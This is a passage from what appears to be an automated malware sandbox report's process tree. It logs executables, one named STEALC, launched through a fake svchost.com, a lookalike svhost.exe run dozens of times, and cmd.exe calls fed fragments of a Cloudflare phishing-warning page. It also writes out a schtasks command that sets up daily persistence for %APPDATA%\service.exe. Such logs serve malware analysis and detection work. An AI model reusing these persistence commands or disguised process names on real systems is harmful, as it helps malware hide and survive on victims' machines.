      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /C schtasks /create /tn WinApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        6⤵
        
        PID:10208
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /C schtasks /create /tn WinApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        7⤵
        
        PID:7940
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn WinApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:10992
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\lastest.exe"
      4⤵
      PID:7964
    - - C:\Users\Admin\Desktop\Files\lastest.exe
        
        C:\Users\Admin\Desktop\Files\lastest.exe
        5⤵
        
        PID:10964
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 844
        6⤵
        
        PID:10176
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\STEALC~1.EXE"
      4⤵
      PID:3756
    - - C:\Users\Admin\Desktop\Files\STEALC~1.EXE
        
        C:\Users\Admin\Desktop\Files\STEALC~1.EXE
        5⤵
        
        PID:6840
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\oclo.exe"
      4⤵
      PID:7388
    - - C:\Users\Admin\Desktop\Files\oclo.exe
        
        C:\Users\Admin\Desktop\Files\oclo.exe
        5⤵
        
        PID:6980
      - C:\Users\Admin\Desktop\Files\oclo.exe
        
        C:\Users\Admin\Desktop\Files\oclo.exe
        6⤵
        
        PID:10876
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\bin.exe"
      4⤵
      PID:10088
    - - C:\Users\Admin\Desktop\Files\bin.exe
        
        C:\Users\Admin\Desktop\Files\bin.exe
        5⤵
        
        PID:10300
- - C:\Users\Admin\Desktop\4363463463464363463463463.exe
    "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4736
  - - C:\Users\Admin\Desktop\Files\dos.exe
      "C:\Users\Admin\Desktop\Files\dos.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:5140
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5160
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c <!DOCTYPE html>     <html class="no-js" lang="en-US">  <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />  <style>body{margin:0;padding:0}</style>  <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script>  </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <p> <a href="https://www.cloudflare.com/learning/access
        5⤵
        
        PID:5424
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c -management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="iPkJu2E3goB6sEkskWpZA0q4ED2UkKSMKx7aOZ5nA6Y-1731966976-0.0.1.1-/json.php?token=ewogICJjcHVDb3JlcyI6ICI4IiwKICAidG90YWxNZW1vcnkiOiAiODE5MiBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIk9GR0FEVVNFIiwKICAib3NWZXJzaW9uIjogIk1pY3Jvc29mdCBXaW5kb3dzIDEwIiwKICAicHJvY2Vzc29yTmFtZSI6ICJJbnRlbCBDb3JlIFByb2Nlc3NvciAoQnJvYWR3ZWxsKSIsCiAgInN5c3RlbU1vZGVsIjogIlVua25vd24gTW9kZWwiLAogICJjb25maWd1cmF0aW9uIjogIjMiLAogICJ0b2tlbiI6ICJZb3VyX1NlY3JldF9Ub2tlbiIKfQ=="> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1
        5⤵
        
        PID:1236
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c ">Cloudflare Ray ID: <strong class="font-semibold">8e4b35a44d7f385b</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">181.215.176.83</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div> </div> </div> <script> window._cf_translation = {}; </script> </body> </html>
        5⤵
        
        PID:1384
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5776
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6124
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4428
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1280
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4408
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2976
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:316
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2940
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5216
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:636
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5336
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5412
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5724
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6108
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:408
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:864
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4100
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5380
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4588
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5180
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3124
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4148
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5244
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4564
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2776
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5736
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5376
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3968
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3588
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1580
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4100
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3988
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2940
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5332
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5636
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4148
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5248
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2376
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5496
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5984
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2296
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4660
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3692
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1580
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2212
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1956
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3336
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4968
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5188
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5200
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5336
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5472
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5100
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5272
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3240
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4032
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5724
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4428
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1280
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1892
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2748
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3176
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5232
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6120
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4532
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3588
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:316
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5144
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2448
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5740
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5460
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5468
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:212
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5776
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5788
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5020
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:408
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3144
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2352
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1140
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5232
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2328
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5792
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4300
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:880
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1936
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1896
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4588
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5740
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1804
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2768
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4424
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1896
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2352
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1568
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2404
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5520
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:220
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4780
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5720
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2768
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1820
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4344
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1112
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3144
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5460
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5740
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5208
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5448
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5528
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4524
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:112
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4172
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5776
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4300
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:760
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3440
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4832
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4444
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c <!DOCTYPE html>     <html class="no-js" lang="en-US">  <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />  <style>body{margin:0;padding:0}</style>  <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script>  </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <p> <a href="https://www.cloudflare.com/learning/access-manag
        5⤵
        
        PID:5724
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:408
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="mgzCZMgHOoLGrYco25G8aANmlz1mOii.eeUzu7c2mik-1731967037-0.0.1.1-/json.php?token=ewogICJjcHVDb3JlcyI6ICI4IiwKICAidG90YWxNZW1vcnkiOiAiODE5MiBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIk9GR0FEVVNFIiwKICAib3NWZXJzaW9uIjogIk1pY3Jvc29mdCBXaW5kb3dzIDEwIiwKICAicHJvY2Vzc29yTmFtZSI6ICJJbnRlbCBDb3JlIFByb2Nlc3NvciAoQnJvYWR3ZWxsKSIsCiAgInN5c3RlbU1vZGVsIjogIlVua25vd24gTW9kZWwiLAogICJjb25maWd1cmF0aW9uIjogIjMiLAogICJ0b2tlbiI6ICJZb3VyX1NlY3JldF9Ub2tlbiIKfQ=="> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Clou
        5⤵
        
        PID:4532
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c dflare Ray ID: <strong class="font-semibold">8e4b372028f69497</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">181.215.176.83</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div> </div> </div> <script> window._cf_translation = {}; </script> </body> </html>
        5⤵
        
        PID:3440
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5200
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:2448
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3784
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6140
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:4556
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:6100
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5680
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3588
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3028
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3784
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:3440
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1620
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:1308
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "C:\Windows\System32\svhost.exe"
        5⤵
        
        PID:5244
    - - C:\Windows\SYSTEM32\cmd.exe
        
